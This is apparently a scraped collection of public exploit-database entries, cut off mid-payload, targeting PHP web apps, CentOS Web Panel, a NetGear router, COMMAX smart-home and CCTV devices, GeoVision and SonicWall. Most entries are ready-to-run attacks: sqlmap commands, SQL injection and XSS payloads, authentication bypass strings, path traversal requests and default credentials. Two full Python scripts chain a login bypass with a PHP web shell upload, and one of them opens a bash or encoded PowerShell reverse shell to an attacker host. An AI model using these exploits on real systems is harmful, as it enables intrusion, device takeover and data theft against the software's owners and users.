ISHACK AI BOT

# Exploit Title: Police Crime Record Management System 1.0 - 'casedetails' SQL Injection # Date: 12/08/2021 # Exploit Author: Ömer Hasan Durmuş # Software Link: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html # Version: v1.0 # Category: Webapps # Tested on: Linux/Windows Step 1 : Login CID account in http://TARGET/ghpolice/login.php default credentials. (005:12345) STEP 2 : Send the following request or Use sqlmap : python sqlmap.py -u " http://TARGET/ghpolice/cid/casedetails.php?id=210728101" --cookie="PHPSESSID=ev8vn1d1de5hjrv9273dunao8j" --dbs -vv # Request GET /ghpolice/cid/casedetails.php?id=210728101'+AND+(SELECT+2115+FROM+(SELECT(SLEEP(5)))GQtj)+AND'gKJE'='gKJE HTTP/1.1 Host: target.com Cache-Control: max-age=0 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://target.com/ghpolice/cid/ Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=ev8vn1d1de5hjrv9273dunao8j Connection: close # Response after 5 seconds HTTP/1.1 200 OK Date: Thu, 12 Aug 2021 21:32:47 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.4.14 X-Powered-By: PHP/7.4.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 6913 Connection: close Content-Type: text/html; charset=UTF-8 ... ... ...

# Exploit Title: Simple Image Gallery System 1.0 - 'id' SQL Injection # Date: 2020-08-12 # Exploit Author: Azumah Foresight Xorlali (M4sk0ff) # Vendor Homepage: https://www.sourcecodester.com/php/14903/simple-image-gallery-web-app-using-php-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14903&title=Simple+Image+Gallery+Web+App+using+PHP+Free+Source+Code # Version: Version 1.0 # Category: Web Application # Tested on: Kali Linux Description: Simple Image Gallery System 1.0 application is vulnerable to SQL injection via the "id" parameter on the album page. POC: Step 1. Login to the application with any verified user credentials Step 2. Click on Albums page and select an albums if created or create by clicking on "Add New" on the top right and select the album. Step 3. Click on an image and capture the request in burpsuite. Now copy the request and save it as test.req . Step 4. Run the sqlmap command "sqlmap -r test.req --dbs Step 5. This will inject successfully and you will have an information disclosure of all databases contents. --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=3' AND 7561=7561 AND 'SzOW'='SzOW Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=3' OR (SELECT 9448 FROM(SELECT COUNT(*),CONCAT(0x7178707071,(SELECT (ELT(9448=9448,1))),0x71787a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'SXqA'='SXqA Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=3' AND (SELECT 1250 FROM (SELECT(SLEEP(5)))aNMX) AND 'qkau'='qkau ---

# Exploit Title: CentOS Web Panel 0.9.8.1081 - Stored Cross-Site Scripting (XSS) # Date: 13/08/2021 # Exploit Author: Dinesh Mohanty # Vendor Homepage: http://centos-webpanel.com # Software Link: http://centos-webpanel.com # Version: v0.9.8.1081 # Tested on: CentOS 7 and 8 # Description: Multiple Stored Cross Site Scripting (Stored XSS) Vulnerability is found in the Short Name, Ip Origin, Key Code, Format Request and Owner fields within the admin api page of module of CentOS/ Control WebPanel when user tries to create a new API. This is because the application does not properly sanitize users input. # Steps to Reproduce: 1. Login into the CentOS Web Panel using admin credential. 2. From Navigation Click on "API Manager" -> then Click on "Allow New API Access" 3. In the above given fields give payload as: <img src=x onerror=alert(1)> and provide other details and click on "Create" 4. Now one can see that the XSS Payload executed. #Vendor Notification 18th Aug 2021 - Vendor has been notified 18th Aug 2021 - Vendor confirmed the issue and fixed for next version

# Exploit Title: RATES SYSTEM 1.0 - Authentication Bypass # Date: 2020-08-13 # Exploit Author: Azumah Foresight Xorlali (M4sk0ff) # Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=14904&title=RATES+SYSTEM+in+PHP+Free+Source+Code # Version: Version 1.0 # Category: Web Application # Tested on: Kali Linux Description: The authentication bypass vulnerability on the application allows an attacker to log in as Client. This vulnerability affects the "username" parameter on the client login page: http://localhost/rates/login.php Step 1: On the login page, simply use the query inside the bracket ( ' OR 1 -- - ) as username Step 2: On the login page, use same query{ ' OR 1 -- -} or anything as password All set you should be logged in as Client.

# Exploit Title: NetGear D1500 V1.0.0.21_1.0.1PE - 'Wireless Repeater' Stored Cross-Site Scripting (XSS) # Date: 21 Dec 2018 # Exploit Author: Securityium # Vendor Homepage: https://www.netgear.com/ # Version: V1.0.0.21_1.0.1PE # Tested on: NetGear D1500 Home Router # Contact: [email protected] Version : Hardware version: D1500-100PES-A Firmware Version : V1.0.0.21_1.0.1PE Step to Reproduce Video: https://www.youtube.com/watch?v=JcRYxH93E5E Tested Network: Local LAN SSID Details: Attacker SSID : <script>confirm(222)</sciprt> Attack Description : If any admin is logged on the router admin panel. if he/she try to connect any other SSID for Wireless Repeating Function. that time they need to check available SSID surrounding. that name is not sanitized properly before showing on the web's admin panel which leads to Stored XSS. This issue was discovered by Touhid M.Shaikh (@touhidshaikh22) Attack Impact: The attacker can steal the cookies of the admin. Step to Reproduce: For Attacker: 1) First, you need to create a hotspot with a vulnerable SSID name. (which you want to get executed on the remote router's admin panel.) 2) In my case, I have created a hotspot from my mobile phone and gives an SSID name to <script>confirm(22)</script> For routers admin 3) Logged in as admin. 2) Go to Advanced --> Advanced Setup --> Wireless Repeating Function 3) Enable Wireless Repeating Function 4) click on check. wait for the checking scan to finish and display the surrounding networks list.

# Exploit Title: Simple Water Refilling Station Management System 1.0 - Authentication Bypass # Exploit Author: Matt Sorrell # Date: 2021-08-14 # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14906/simple-water-refilling-station-management-system-php-free-source-code.html # Version: 1.0 # Tested On: Windows Server 2019 and XAMPP 7.4.22 # The Simple Water Refilling Station Management System # is vulnerable to a SQL Injection because it fails to sufficiently sanitize # user-supplied data before using it in a SQL query. Successful exploitation # of this issue could allow an attacker to bypass the application's # authentication controls and possibly access other sensitive data. # Vulnerable Code: Line 21 in water_refilling/classes/Login.php qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') "); # Vulnerable Request POST /water_refilling/classes/Login.php?f=login HTTP/1.1 Host: localhost Connection: keep-alive Content-Length: 35 sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92" Accept: */* X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/water_refilling/admin/login.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=64v67e3dctju48lon9d8gepct7 username=a&password=a # Vulnerable Payload # Parameter: username (POST) username=a'+OR+1%3D1--+-&password=a

# Exploit Title: Simple Water Refilling Station Management System 1.0 - Remote Code Execution (RCE) through File Upload # Exploit Author: Matt Sorrell # Date: 2021-08-14 # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14906/simple-water-refilling-station-management-system-php-free-source-code.html # Version: 1.0 # Tested On: Windows Server 2019 and XAMPP 7.4.22 # The Simple Water Refilling Station Management System # contains a file upload vulnerability that allows for remote # code execution against the target. This exploit requires # the user to be authenticated, but a SQL injection in the login form # allows the authentication controls to be bypassed. The application does not perform # any validation checks against the uploaded file at "/classes/SystemSettings.php" # and the directory it is placed in allows for execution of PHP code. #!/usr/bin/env python3 import requests from bs4 import BeautifulSoup as bs import time import subprocess import base64 import sys def login_with_injection(url, session): target = url + "/classes/Login.php?f=login" data = { "username": "test' OR 1=1-- -", "password": "test" } r = session.post(target, data=data) if '"status":"success"' in r.text: return True else: return False def upload_shell(url, session): target = url + "/classes/SystemSettings.php?f=update_settings" files = {'img': ('shell.php', "<?php system($_REQUEST['cmd']); ?>", 'application/x-php')} r = session.post(target, files=files) if r.headers['Content-Length'] != 1: print("[+] Shell uploaded.\n") return r.links else: print("Error uploading file. Exiting.") exit(-1) def activate_shell(url, session, OS, rev_ip, rev_port): target = url + "/admin/?page=system_info" r = session.get(target) page_data = r.text soup = bs(page_data, features='lxml') for link in soup.find_all('link'): if "shell" in link.get('href'): shell_url = link.get('href') break print(f"[+] Found URL for shell: {shell_url}\n") print("[*] Attempting to start reverse shell...") subprocess.Popen(["nc","-nvlp",f"{rev_port}"]) time.sleep(1) if OS.lower() == "linux": cmd = f"bash -c 'bash -i >& /dev/tcp/{rev_ip}/{rev_port}'" else: cmd = f"$TCPClient = New-Object Net.Sockets.TCPClient('{rev_ip}', {rev_port});$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {{[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {{0}};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {{$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {{Invoke-Expression $Command 2>&1 | Out-String}} catch {{$_ | Out-String}}WriteToStream ($Output)}}$StreamWriter.Close()".strip() cmd = "C:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -enc " + base64.b64encode(cmd.encode('UTF-16LE')).decode() r = session.get(shell_url+"?cmd="+cmd) def main(): if len(sys.argv) != 5: print(f"(+) Usage:\t python3 {sys.argv[0]} <TARGET IP> <LISTENING IP> <LISTENING PORT> <WINDOWS/LINUX Target>") print(f"(+) Usage:\t python3 {sys.argv[0]} 10.1.1.1 10.1.1.20 443 windows") exit(-1) else: ip = sys.argv[1] rev_ip = sys.argv[2] rev_port = sys.argv[3] OS = sys.argv[4] URL = f"http://{ip}/water_refilling" s = requests.Session() print("[*] Trying to bypass authentication through SQL injection...\n") if not login_with_injection(URL, s): print("[-] Failed to login. Exiting.") exit(-1) else: print("[+] Successfully logged in.\n") time.sleep(2) print("[*] Trying to upload shell through system logo functionality...\n") links = upload_shell(URL, s) # Sleeping for 2 seconds to avoid problems finding the file uploaded time.sleep(2) print("[*] Getting shell URL and sending reverse shell command...\n") activate_shell(URL, s, OS, rev_ip, rev_port) while True: pass if __name__ == "__main__": main()

# Exploit Title: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass # Date: 02.08.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.commax.com COMMAX Biometric Access Control System 1.0.0 Authentication Bypass Vendor: COMMAX Co., Ltd. Prodcut web page: https://www.commax.com Affected version: 1.0.0 Summary: Biometric access control system. Desc: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings. Tested on: nginx/1.14.0 (Ubuntu) MariaDB/10.3.15 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5661 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php 02.08.2021 -- The following request with Cookie forging bypasses authentication and lists available SQL backups. GET /db_dump.php HTTP/1.1 Host: 192.168.1.1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.1.1/user_add.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0 Connection: close HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 03 Aug 1984 14:07:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 10316 <!DOCTYPE html> <html class="no-js" lang="ko"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>::: COMMAX :::</title> ... ...

# Exploit Title: COMMAX Smart Home IoT Control System CDP-1020n - SQL Injection Authentication Bypass # Date: 02.08.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.commax.com COMMAX Smart Home IoT Control System CDP-1020n SQL Injection Authentication Bypass Vendor: COMMAX Co., Ltd. Prodcut web page: https://www.commax.com Affected version: CDP-1020n 481 System Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment complex that provides advanced life values and safety. Desc: The application suffers from an SQL Injection vulnerability. Input passed through the 'id' POST parameter in 'loginstart.asp' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism. Tested on: Microsoft-IIS/7.5 ASP.NET Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5662 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5662.php 02.08.2021 -- POST /common/loginstart.asp?joincode={{truncated}} HTTP/1.1 Host: localhost Connection: keep-alive Content-Length: 37 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/mainstart.asp Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6 Cookie: {} id=%27+or+1%3D1--&x=0&y=0&pass=waddup HTTP/1.1 200 OK Cache-Control: private Content-Length: 621 Content-Type: text/html Server: Microsoft-IIS/7.5 Set-Cookie: {} X-Powered-By: ASP.NET Date: Tue, 03 Aug 1984 22:57:56 GMT

# Exploit Title: COMMAX Smart Home Ruvie CCTV Bridge DVR Service - RTSP Credentials Disclosure # Date: 02.08.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.commax.com COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credentials Disclosure Vendor: COMMAX Co., Ltd. Prodcut web page: https://www.commax.com Affected version: n/a Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment complex that provides advanced life values and safety. Desc: The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose RTSP credentials in plain-text. Tested on: GoAhead-Webs Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5665 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php 02.08.2021 -- $ curl http://TARGET:8086/overview.asp <HTML> <HEAD> <TITLE> Infomation</TITLE> <script src="./jquery.min.js"></script> <script src="./jquery.cookie.js"></script> <script src="./login_check.js"></script> </HEAD> <BODY> <br><br> <center> <table> <tr><td> <li> [2021/08/15 09:56:46] Started <BR> <li> MAX USER : 32 <BR> <li> DVR Lists <BR>[1] rtsp://admin:s3cr3tP@[email protected]:554/Streaming/Channels/2:554 <BR> </td></tr> </table> </center> </BODY> </HTML> $ curl http://TARGET:8086/login_check.js: var server_ip = $(location).attr('host'); var server_domain = server_ip.replace(":8086", ""); document.domain = server_domain; var cookiesAuth = $.cookie("cookiesAuth"); if (cookiesAuth != "authok") { parent.document.location.href = "http://" + server_domain + ":8086/home.asp"; }

# Exploit Title: COMMAX Smart Home Ruvie CCTV Bridge DVR Service - Config Write / DoS (Unauthenticated) # Date: 02.08.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.commax.com COMMAX Smart Home Ruvie CCTV Bridge DVR Service Unauthenticated Config Write / DoS Vendor: COMMAX Co., Ltd. Prodcut web page: https://www.commax.com Affected version: n/a Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment complex that provides advanced life values and safety. Desc: The application allows an unauthenticated attacker to change the configuration of the DVR arguments and/or cause denial-of-service scenario through the setconf endpoint. Tested on: GoAhead-Webs Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5666 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5666.php 02.08.2021 -- #1 $ curl -X POST http://192.168.1.1:8086/goform/setconf --data"manufacturer=Commax&Ch0=0&dvr0=rtsp%3A%2F%2Fadmin%3A1234zeroscience.mk%3A554%2FStream%2FCh01%3A554&dvr1=&dvr2=&dvr3=&dvr4=&dvr5=&dvr6=&dvr7=&dvr8=&dvr9=&dvr10=&dvr11=&dvr12=&dvr13=&dvr14=&dvr15=&dvr16=&dvr17=&dvr18=&dvr19=&dvr20=&dvr21=&dvr22=&dvr23=&ok=OK" * Trying 192.168.1.1... * TCP_NODELAY set * Connected to 192.168.1.1 (192.168.1.1) port 8086 (#0) > POST /goform/setconf HTTP/1.1 > Host: 192.168.1.1:8086 > User-Agent: curl/7.55.1 > Accept: */* > Content-Length: 257 > Content-Type: application/x-www-form-urlencoded > * upload completely sent off: 257 out of 257 bytes * HTTP 1.0, assume close after body < HTTP/1.0 200 OK < Server: GoAhead-Webs < Pragma: no-cache < Cache-control: no-cache < Content-Type: text/html < <html> <br><br><center><table><tr><td>Completed to change configuration! Restart in 10 seconds</td></tr></table></center></body></html> * Closing connection 0 #2 $ curl -v http://192.168.1.1:8086 * Rebuilt URL to: http://192.168.1.1:8086/ * Trying 192.168.1.1... * TCP_NODELAY set * connect to 192.168.1.1 port 8086 failed: Connection refused * Failed to connect to 192.168.1.1 port 8086: Connection refused * Closing connection 0 curl: (7) Failed to connect to 192.168.1.1 port 8086: Connection refused

# Exploit Title: COMMAX CVD-Axx DVR 5.1.4 - Weak Default Credentials Stream Disclosure # Date: 02.08.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.commax.com COMMAX CVD-Axx DVR 5.1.4 Weak Default Credentials Stream Disclosure Vendor: COMMAX Co., Ltd. Prodcut web page: https://www.commax.com Affected version: CVD-AH04 DVR 4.4.1 CVD-AF04 DVR 4.4.1 CVD-AH16 DVR 5.1.4 CVD-AF16 DVR 4.4.1 CVD-AF08 DVR 5.1.2 CVD-AH08 DVR 5.1.2 Summary: COMMAX offers a wide range of proven AHD CCTV systems to meet customer needs and convenience in single or multi-family homes. Desc: The web control panel uses weak set of default administrative credentials that can be easily guessed in remote password attacks and disclose RTSP stream. Tested on: Boa/0.94.14rc19 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5667 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5667.php 02.08.2021 -- Login: $ curl -X POST http://192.168.1.2/cgi-bin/websetup.cgi -d="passkey=1234" HTTP/1.1 200 OK Date: Mon, 16 Aug 2021 01:04:52 GMT Server: Boa/0.94.14rc19 Accept-Ranges: bytes Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"> IE (ActiveX) web player: http://192.168.1.2/web_viewer2.html Snapshots: http://192.168.1.2/images/snapshot-01.jpg http://192.168.1.2/images/snapshot-02.jpg http://192.168.1.2/images/snapshot-nn.jpg Creds: Users: ADMIN,USER1,USER2,USER3 Password: 1234

# Exploit Title: GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE # DynamicDNS Network to find: DIPMAP.COM / GVDIP.COM # Date: 6-16-21 (Vendor Notified) # Exploit Author: Ken 's1ngular1ty' Pyle # Vendor Homepage: https://www.geovision.com.tw/cyber_security.php # Version: <= 5.3.3 # Tested on: Windows 20XX / MULTIPLE # CVE : https://www.geovision.com.tw/cyber_security.php GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. This allows injection of HTML code and XSS / client side exploitation, including session theft: Nested Exploitation of the LFI, XSS, HTML / Browser Injection: GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=<script>test</script><iframe%20src=""> HTTP/1.1 Absolute exploitation of the LFI: POST /Visitor/bin/WebStrings.srf?obj_name=win.ini GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini Additionally, the vendor has issued an ineffective / broken patch (https://www.geovision.com.tw/cyber_security.php) which does not appear to remediate or address the problem. Versions 5.3.3 and below continue to be affected. This is acknowledged by the vendor. ex. obj_name=INJECTEDHTML / XSS The application fails to properly enforce permissions and sanitize user request. This allows for LFI / Remote Code Execution through several vectors: ex. /Visitor//%252e(path to target) These vectors can be blended / nested to exfiltrate data in a nearly undetectable manner, through the API: The devices are vulnerable to HOST HEADER POISONING and CROSS-SITE REQUEST FORGERY against the web application. These can be used for various vectors of attack. These attacks were disclosed as part of the IOTVillage Presentation: https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20villages/DEFCON%2029%20IoT%20Village%20-%20Ken%20Pyle%20-%20BLUEMONDAY%20Series%20Exploitation%20and%20Mapping%20of%20Vulnerable%20Devices%20at%20Scale.mp4

# Exploit Title: SonicWall NetExtender 10.2.0.300 - Unquoted Service Path # Exploit Author: shinnai # Software Link: https://www.sonicwall.com/products/remote-access/vpn-clients/ # Version: 10.2.0.300 # Tested On: Windows # CVE: CVE-2020-5147 --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Title: SonicWall NetExtender windows client unquoted service path vulnerability Vers.: 10.2.0.300 Down.: https://www.sonicwall.com/products/remote-access/vpn-clients/ Advisory: https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0023 CVE ID: CVE-2020-5147 (https://nvd.nist.gov/vuln/detail/CVE-2020-5147) URLs: https://besteffortteam.it/sonicwall-netextender-windows-client-unquoted-service-path-vulnerability/ https://shinnai.altervista.org/exploits/SH-029-20210109.html Desc.: SonicWall NetExtender Windows client vulnerable to unquoted service path vulnerability, this allows a local attacker to gain elevated privileges in the host operating system. This vulnerability impact SonicWall NetExtender Windows client version 10.2.300 and earlier. Poc: C:\>sc qc sonicwall_client_protection_svc [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: sonicwall_client_protection_svc TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files\SonicWall\Client Protection Service\SonicWallClientProtectionService.exe <-- Unquoted Service Path Vulnerability GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : SonicWall Client Protection Service DIPENDENZE : SERVICE_START_NAME : LocalSystem C:\> ---------------------------------------------------------------------------------------------------------------------------------------------------------------------- C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ SonicWall Client Protection Service sonicwall_client_protection_svc C:\Program Files\SonicWall\Client Protection Service\SonicWallClientProtectionService.exe Auto C:\> ----------------------------------------------------------------------------------------------------------------------------------------------------------------------

# Exploit Title: Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Date: 17.08.2021 # Exploit Author: Tagoletta (Tağmaç) # Software Link: https://www.sourcecodester.com/php/14903/simple-image-gallery-web-app-using-php-free-source-code.html # Version: V 1.0 # Tested on: Ubuntu import requests import random import string import json from bs4 import BeautifulSoup url = input("TARGET = ") if not url.startswith('http://') and not url.startswith('https://'): url = "http://" + url if not url.endswith('/'): url = url + "/" payload= "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>" session = requests.session() print("Login Bypass") request_url = url + "/classes/Login.php?f=login" post_data = {"username": "admin' or '1'='1'#", "password": ""} bypassUser = session.post(request_url, data=post_data) data = json.loads(bypassUser.text) status = data["status"] if status == "success": let = string.ascii_lowercase shellname = ''.join(random.choice(let) for i in range(15)) shellname = 'Tago'+shellname+'Letta' print("shell name "+shellname) print("\nprotecting user") request_url = url + "?page=user" getHTML = session.get(request_url) getHTMLParser = BeautifulSoup(getHTML.text, 'html.parser') ids = getHTMLParser.find('input', {'name':'id'}).get("value") firstname = getHTMLParser.find('input', {'id':'firstname'}).get("value") lastname = getHTMLParser.find('input', {'id':'lastname'}).get("value") username = getHTMLParser.find('input', {'id':'username'}).get("value") print("\nUser ID : " + ids) print("Firsname : " + firstname) print("Lasname : " + lastname) print("Username : " + username + "\n") print("shell uploading") request_url = url + "/classes/Users.php?f=save" request_headers = {"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary9nI3gVmJoEZoZyeA"} request_data = "------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n"+ids+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\n"+firstname+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\n"+lastname+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+username+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n------WebKitFormBoundary9nI3gVmJoEZoZyeA--\r\n" upload = session.post(request_url, headers=request_headers, data=request_data) if upload.text == "1": print("- OK -") req = session.get(url + "/?page=user") parser = BeautifulSoup(req.text, 'html.parser') find_shell = parser.find('img', {'id':'cimg'}) print("Shell URL : " + find_shell.get("src") + "?cmd=whoami") else: print("- NO :( -") else: print("No bypass user")

# Exploit Title: Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated) # Date: 17/08/2021 # Exploit Author: Davide 't0rt3ll1n0' Taraschi # Vendor Homepage: https://www.sourcecodester.com/users/osman-yahaya # Software Link: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html # Version: 1.0 # Testeted on: Linux (Ubuntu 20.04) using LAMPP ## Impact: An authenticated user may be able to read data for which is not authorized, tamper with or destroy data, or possibly even read/write files or execute code on the database server. ## Description: All four parameters passed via POST are vulnerable: `fname` is vulnerable both to boolean-based blind and time-based blind SQLi `oname` is vulnerable both to boolean-based blind and time-based blind SQLi `username` is only vulnerable to time-based blind SQLi `status` is vulnerable both to boolean-based blind and time-based blind SQLi ## Remediation: Here is the vulnerable code: if($status==''){ mysqli_query($dbcon,"update userlogin set surname='$fname', othernames='$oname' where staffid='$staffid'")or die(mysqli_error()); } if(!empty($status)){ mysqli_query($dbcon,"update userlogin set surname='$fname',status='$status', othernames='$oname' where staffid='$staffid'")or die(mysqli_error()); } As you can see the parameters described above are passed to the code without being checked, this lead to the SQLi. To patch this vulnerability, i suggest to sanitize those variables via `mysql_real_escape_string()` before being passed to the prepared statement. ## Exploitation through sqlmap 1) Log into the application (you can try the default creds 1111:admin123) 2) Copy your PHPSESSID cookie 3) Launch the following command: sqlmap --method POST -u http://$target/ghpolice/admin/savestaffedit.php --data="fname=&oname=&username=&status=" --batch --dbs --cookie="PHPSESSID=$phpsessid" replacing $target with your actual target and $phpsessid with the cookie that you had copied before ## PoC: Request: POST /ghpolice/admin/savestaffedit.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 77 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/ghpolice/admin/user.php Cookie: PHPSESSID=f7123ac759cd97868df0f363434c423f Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 fname=' AND (SELECT * 